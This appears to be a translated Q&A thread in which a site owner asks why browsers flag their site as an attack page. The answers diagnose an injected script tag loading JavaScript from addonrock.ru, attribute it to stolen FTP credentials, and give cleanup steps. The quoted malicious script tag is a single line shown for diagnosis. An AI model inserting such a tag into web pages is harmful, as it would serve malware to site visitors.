报告攻击页面:如何解决此问题

报告攻击页面:如何解决此问题

我的网站bccfalna.com两天前运行正常,但现在无法在 Firefox/Chrome 和其他浏览器中打开,并出现以下错误消息

报告攻击页面!

www.bccfalna.com 上的网页已被报告为攻击页面,并已根据您的安全偏好进行阻止。

那么,如何解决这个安全问题,请帮我解决它......

答案1

您的网站已被 Google 安全浏览列入黑名单。它集成在 Firefox、Safari 和 Chrome(不是 Internet Explorer)中。

首先检查 Google 安全浏览在诊断页

Malicious software is hosted on 1 domain(s), including addonrock.ru/

因此,在某个地方,您有一个指向此域名的链接。事实上,在您所有的页面上,您都会在代码末尾的 </html> 标记后找到此内容:

<script type="text/javascript" src="http://addonrock.ru/Java.js"></script>

您的 Web 应用程序已被黑客入侵!如果您使用的是开源应用程序,请检查是否正在运行最新版本(也请检查插件)。可能存在已知漏洞。

接下来要做的事情如下:

  1. 了解您的网站是如何被黑客入侵的:应用程序中的已知漏洞、托管服务提供商的问题、代码中的漏洞(远程文件包含等)等。
  2. 堵住漏洞:升级你的应用程序,修复你自己的代码等等。
  3. 检查所有文件和数据库是否存在恶意代码
  4. 恢复安全备份

如果您确定攻击者没有留下任何后门,则第 4 步是可以的。当然,您永远无法 100% 确定……如果您有足够的时间和金钱,请使用新服务器来托管您的网站。

答案2

好吧,假设您没有故意传播恶意软件,我敢打赌您一定是被黑客入侵了,并且病毒或恶意软件正在从您的网站传播。

页面上有关于正在发生的事情的详细信息。

删除所有内容并从已知良好的备份中恢复。

答案3

addonrock.ru 和 alienradar.ru 的脚本通过 FTP 插入。

一些 Windows 恶意软件从 Filezilla 和其他常见的 FTP 客户端获取 FTP 登录信息。

基本上来说:

1) 清理您的客户端机器。2) 更改服务器上的所有密码。3) 替换所有受感染的文件。如果您无法访问日志,请将其全部替换。

相关内容